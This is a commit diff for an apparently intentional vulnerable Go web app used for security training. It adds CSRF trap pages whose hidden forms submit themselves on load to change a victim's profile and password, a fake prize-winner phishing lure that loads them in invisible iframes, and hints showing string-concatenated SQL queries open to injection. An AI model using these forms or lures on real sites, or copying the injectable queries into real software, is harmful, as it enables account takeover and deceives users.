Merge pull request Hardw01f#42 from Snow-HardWolf/refactor/Beterrafor…

…mrize Refactor/beterraformrize
Bearer · Dec 8, 2019 · fcd8c76 · fcd8c76
2 parents 992c722 + 301baad
commit fcd8c76
Show file tree

Hide file tree

Showing 9 changed files with 42 additions and 15 deletions.
diff --git a/Trap/DetailCSRF.gtpl b/Trap/DetailCSRF.gtpl
@@ -7,7 +7,7 @@
 <link rel="stylesheet" href="./assets/style.css" type="text/css"> 
 <body onload="document.csrf.submit();">
 <p>aaaaa</p>
-<form name="csrf" action="http://localhost:9090/profile/edit/update" method="POST">
+<form name="csrf" action="http://localhost/profile/edit/update" method="POST">
     <input type="hidden" name="username" value="Hacked!!">
     <input type="hidden" name="age" value="2048">
     <input type="hidden" name="mail" value="[email protected]">

diff --git a/Trap/PasswdCSRF.gtpl b/Trap/PasswdCSRF.gtpl
@@ -7,7 +7,7 @@
 <link rel="stylesheet" href="./assets/style.css" type="text/css"> 
 <body onload="document.csrf.submit();">
 <p>aaaaa</p>
-<form name="csrf" action="http://localhost:9090/profile/compchangepasswd" method="POST">
+<form name="csrf" action="http://localhost/profile/compchangepasswd" method="POST">
 <input type="hidden" name="passwd" value="bouyadakarasa...">
 <input type="hidden" name="confirm" value="bouyadakarasa...">
 <input type="submit" value="submit">

diff --git a/Trap/Trap.gtpl b/Trap/Trap.gtpl
@@ -2,11 +2,14 @@
 <head>
 </head>
 <div id="header_title">
-<h1>Vulnerability Apps</h1>
+<h1>超お得なキャンペーン情報</h1>
 </div>
 <link rel="stylesheet" href="./assets/style.css" type="text/css"> 
 <body>
-<p>aaaaa</p>
+<h2>おめでとうございます！</h2>
+<p>１億人の中からあなたが超豪華商品の当選者に選ばれました！</p>
+<p>豪華商品の受け取りにはメールアドレスの登録が必要です！</p>
+<p>以下の〜〜〜〜からメールアドレスを登録してください！</p>
 <iframe width="1" height="1" src="/passwdCSRF"></iframe>
 <iframe width="1" height="1" src="/detailCSRF"></iframe>
 </body>

diff --git a/Trap/init.sh b/Trap/init.sh
@@ -0,0 +1,2 @@
+sed -i -e s/localhost/`curl http://ip4.me | grep size=+ | awk -F'>' '{print $4}' | awk -F'<' '{print $1}'`/g ./Trap/DetailCSRF.gtpl
+sed -i -e s/localhost/`curl http://ip4.me | grep size=+ | awk -F'>' '{print $4}' | awk -F'<' '{print $1}'`/g ./Trap/PasswdCSRF.gtpl
diff --git a/assets/css/styleClear.css b/assets/css/styleClear.css
@@ -109,6 +109,12 @@ p { color:#ffffff;
     right:5%;
     top:5%;
     bottom:2%;
+    overflow: auto;
+}
+
+.whitebox h2,h3 {
+    text-align: center;
+    color: #000000;
 }
 
 .profileBox {

diff --git a/main.go b/main.go
@@ -1,6 +1,7 @@
 package main
 
 import (
+	"flag"
 	"fmt"
 	"log"
 	"net/http"
@@ -125,6 +126,10 @@ func Hints(w http.ResponseWriter, r *http.Request) {
 }
 
 func main() {
+	var portNum = flag.String("p", "80", "Specify application server listening port")
+	flag.Parse()
+	fmt.Println("Vulnapp server listening : " + *portNum)
+
 	http.Handle("/assets/", http.StripPrefix("/assets/", http.FileServer(http.Dir("assets/"))))
 	http.HandleFunc("/", sayYourName)
 	http.HandleFunc("/test", test)
@@ -148,7 +153,7 @@ func main() {
 	http.HandleFunc("/adminlogin", admin.ShowAdminLogIn)
 	http.HandleFunc("/adminconfirm", admin.Confirm)
 	http.HandleFunc("/adminusers", admin.ShowAdminPage)
-	err := http.ListenAndServe(":9090", nil)
+	err := http.ListenAndServe(":"+*portNum, nil)
 	if err != nil {
 		log.Fatal("ListenAndServe: ", err)
 	}

diff --git a/runenv/docker-compose.yml b/runenv/docker-compose.yml
@@ -11,7 +11,7 @@ services:
     ports:
       - 3306:3306
     volumes:
-      - ~/Vulnerability-goapp/runenv/mysql:/etc/mysql
+      - /Vulnerability-goapp/runenv/mysql:/etc/mysql
       - ./mysql-data/init.sql:/docker-entrypoint-initdb.d/grant.sql:rw
     container_name: vulnapp-mysql
 
@@ -20,9 +20,9 @@ services:
     ports:
       - 80:80
     volumes:
-      - ~/Vulnerability-goapp:/goapp
+      - /Vulnerability-goapp:/goapp
     working_dir: /goapp
-    command: sh -c "apk add git mysql-client && go get github.com/go-sql-driver/mysql && sh ./runenv/Devbuildaemon.sh"
+    command: sh -c "apk add git mysql-client && go get github.com/go-sql-driver/mysql && go get golang.org/x/xerrors && go build -o vulnapp && ./vulnapp -p 80"
     depends_on:
       - mysql
     container_name: vulnapp-goapp
@@ -32,8 +32,8 @@ services:
     ports:
       - 3030:3030
     volumes:
-      - ~/Vulnerability-goapp:/goapp
-    working_dir: /goapp
-    command: sh -c "apk add git && go get github.com/go-sql-driver/mysql && go get golang.org/x/xerrors && sh ./runenv/Devbuildaemon.sh"
+      - /Vulnerability-goapp:/goapp
+    working_dir: /goapp/Trap
+    command: sh -c "apk add git && go get github.com/go-sql-driver/mysql && go get golang.org/x/xerrors && go build -o trapapp && ./trapapp"
     container_name: vulnapp-csrftrap
 
diff --git a/runenv/mysql-data/init.sql b/runenv/mysql-data/init.sql
@@ -2,10 +2,10 @@ SET CHARACTER_SET_CLIENT = utf8;
 SET CHARACTER_SET_CONNECTION = utf8;
 create database vulnapp;
 create table vulnapp.user (id int not null auto_increment primary key, name varchar(255) not null,mail varchar(255),age int not null,passwd varchar(255) not null, created_at timestamp not null default current_timestamp, updated_at timestamp not null default current_timestamp on update current_timestamp);
-insert into vulnapp.user (name,mail,age,passwd) values ("Amuro Ray","[email protected]",15,"Mieru,Mieruzo!"),("Char Aznable","[email protected]",20,"BouyaDakarasa..."),("Kamille Bidan","[email protected]",17,"Kikoeru...Koega..."),("Judau Ashta","[email protected]",14,"Hamaaaan!!"),("Banagher Links","[email protected]",16,"HitoNoMiraiHa...HitoGaTsukuruMonoDa!!!");
+insert into vulnapp.user (name,mail,age,passwd) values ("Amuro Ray","[email protected]",15,"Amuro,Ikima-su!"),("Char Aznable","[email protected]",20,"AkaiSuisei"),("Banagher Links","[email protected]",16,"CongratulationsNowYouHaveMasteredSQLinjection");
 create table vulnapp.sessions (uid int,sessionid varchar(128));
 create table vulnapp.userdetails (uid int not null primary key, userimage varchar(64), address varchar(64), animal varchar(32), word varchar(64));
-insert vulnapp.userdetails(uid,userimage,address,animal,word) values (1,"amuro.png","SIDE-7","GANDOM","アムロ、行きまーす！"),(2,"char.png","SIDE-3","ZAKU","Misetemoraouka...RenpouNoMStoYarawo!!"),(3,"kamiyu.png","SIDE-7","Z-GANDOM","遊びでやってんじゃないんだよ!!!"),(4,"judou.png","SIDE-1","ZZ-GANDOM","貴様のようなやつは････許せないんだよ!!"),(5,"unicorn.png","INDUSTRIAL-7","UNICORN GANDOM","人の未来は...人が作るものだ!!");
+insert vulnapp.userdetails(uid,userimage,address,animal,word) values (1,"amuro.png","SIDE-7","GANDOM","こいつ...、動くぞ!"),(2,"char.png","SIDE-3","ZAKU","連邦のMSは化物か!?"),(3,"unicorn.png","INDUSTRIAL-7","UNICORN GANDOM","人の未来は...人が作るものだ!!");
 create table vulnapp.posts (postid int not null primary key auto_increment, uid int not null, post varchar(256) not null, created_at timestamp not null default current_timestamp);
 create table vulnapp.admins (adminid int primary key not null auto_increment, mail varchar(32), passwd varchar(64));
 insert into vulnapp.admins(mail,passwd) values ("[email protected]","Qwerty1234"),("[email protected]","RX-78-2");

diff --git a/views/hints/hints.gtpl b/views/hints/hints.gtpl
@@ -29,8 +29,19 @@
 </div>
 
 <div class="box">
-<div class="whitebox"
-<h1></h1>
+<div class="whitebox">
+<h1><u>レンダリング</u></h1>
+<br>
+<h2>golangの場合はレンダリングの処理は以下のようになる</h2>
+<br>
+<h2><pre>&lt;h1&gt;&#123;&#123;.UserName&#125;&#125;&lt;/h1&gt;</pre></h2>
+<h2>&#123;&#123; &#125;&#125;に囲われた部分にレンダリングします</h2>
+<br><br><br>
+<h1><u>どこかで呼ばれているSQL文</u></h1>
+<br>
+<h2>"select post,created_at from vulnapp.posts where post like \"%" + searchWord + "%\";"</h2>
+<br>
+<h2>"select adminid from vulnapp.admins where mail=\"" + requestMail + "\" and passwd=\"" + requestPasswd + "\";"</h2>
 </div>
 </div>
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@
		sed -i -e s/localhost/`curl http://ip4.me \| grep size=+ \| awk -F'>' '{print $4}' \| awk -F'<' '{print $1}'`/g ./Trap/DetailCSRF.gtpl
		sed -i -e s/localhost/`curl http://ip4.me \| grep size=+ \| awk -F'>' '{print $4}' \| awk -F'<' '{print $1}'`/g ./Trap/PasswdCSRF.gtpl